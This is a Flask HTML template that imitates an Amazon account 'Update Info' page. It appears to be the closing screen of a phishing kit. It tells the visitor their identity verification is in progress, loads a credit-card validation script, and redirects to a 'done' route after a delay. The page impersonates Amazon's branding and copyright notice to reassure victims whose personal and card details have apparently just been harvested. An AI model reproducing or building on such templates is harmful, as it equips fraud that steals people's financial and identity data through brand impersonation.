<!DOCTYPE html>
<html>
    <head>
        <title>Amazon - Update Info</title>
        <meta charset="UTF-8">
        <link rel="shortcut icon" href="{{ url_for('static',filename='img/favicon.ico') }}" />
        <link rel="stylesheet" type="text/css" href="{{ url_for('static',filename='css/boostrap.min.css') }}" media="all">
        <link rel="stylesheet" href="{{ url_for('static',filename='css/sign-dekstop.css') }}">
        <link rel="stylesheet" href="{{ url_for('static',filename='css/style.sign-desktop.css') }}">
        <link rel="stylesheet" type="text/css" href="{{ url_for('static',filename='css/style.css') }}">
    </head>

    <body onload="_loader()" style="margin:0;">
        <div id="loader"></div>
        <div style="display:none;" id="myDiv" class="animate-bon ttom">
            <div id="a-page">
                <div class="a-section a-padding-medium auth-workflow">
                    <div class="a-section a-spacing-none auth-navbar">
                        <div class="a-section a-spacing-medium a-text-center">
                            <div class="a-link-nav-icon"></div><i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
                        </div>
                    </div>
                    <div id="authportal-center-section" class="a-section">
                        <div class="cc-content6" style="padding-top: 5px">
                            <div class="container">
                                <div align="center"> <img src="{{ url_for('static',filename='img/finish.png') }}" width="150"> </div>
                                <div align="center"> <span class="lefttext" style="font-size: 20px; font-weight: 650;">Thank you!</span> </div><br>
                                <div align="center"> <span class="lefttext" style="font-size: 18px;">Your Identity verification is in progress.</span> </div>
                                <div align="center"> <span class="lefttext" style="font-size: 18px;">We will notify you via email message as soon as your account will be verified.</span> </div>
                            </div>
                        </div>
                    </div>
                    <div class="a-section a-spacing-top-extra-large auth-footer">
                        <div class="a-divider a-divider-section">
                            <div class="a-divider-inner"></div>
                        </div>
                        <div class="a-section a-spacing-small a-text-center a-size-mini"> <span class="auth-footer-seperator"></span>
                            <a class="a-link-normal"href="javascript void(0)">Conditions of Use</a>
                            <span class="auth-footer-seperator"></span>
                            <a class="a-link-normal" href="javascript void(0)">Privacy Notice</a>
                            <span class="auth-footer-seperator"></span>
                            <a class="a-link-normal" href="javascript void(0)">Help</a>
                            <span class="auth-footer-seperator"></span>
                        </div>
                        <div class="a-section a-spacing-none a-text-center"> <span class="a-size-mini a-color-secondary"> © 1996-2023, Amazon.com, Inc. or its affiliates </span> </div>
                    </div>
                </div>
                <script src="{{ url_for('static',filename='js/jquery-3.3.1.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.mask.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.validate.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/additional-methods.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.creditCardValidator.js') }}"></script>
                <script>
                    let load;

                    let _loader = () => {
                        load = setTimeout(showPage, 1000);
                    }

                    let showPage = () => {
                        document.getElementById('loader').style.display = 'none';
                        document.getElementById('myDiv').style.display = 'block';
                    }

                    let timer = setTimeout(function() {
                        window.location = "{{ url_for('done') }}"
                    }, 7250);
                </script>
    </body>
</html>